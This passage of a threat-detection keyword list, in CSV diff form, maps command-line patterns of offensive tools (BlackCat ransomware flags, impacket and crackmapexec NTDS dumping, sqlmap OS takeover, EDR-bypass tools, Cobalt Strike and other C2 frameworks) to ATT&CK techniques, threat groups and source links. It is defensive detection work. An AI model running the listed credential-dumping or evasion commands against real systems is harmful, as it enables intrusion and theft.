ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --no-sigthief*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* --no-vm-kill*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --no-vm-snapshot-kill*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --no-wall*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* NtCr3at3Thr3adEx @ *","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z"
+"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"* -ntds ntds.dit.save -system system.save LOCAL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -nthash * -spn * -domain-sid * -domain *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"* --ntlm-proxy-ip * --ntlm-proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
+"* ntlmrecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"* NTLMv1 captured *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"* ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --nt-offsets 
*.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"* ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nuages.formatImplantLastSeen*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"* NuagesImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"* -o /share/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* -o cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" +"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"* -oA icebreaker-scan*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - 
TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* onesixtyone.c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --outdir ldapdomaindump *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* owa * --user-as-pass *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"* oxidfind -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* oxidfind -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 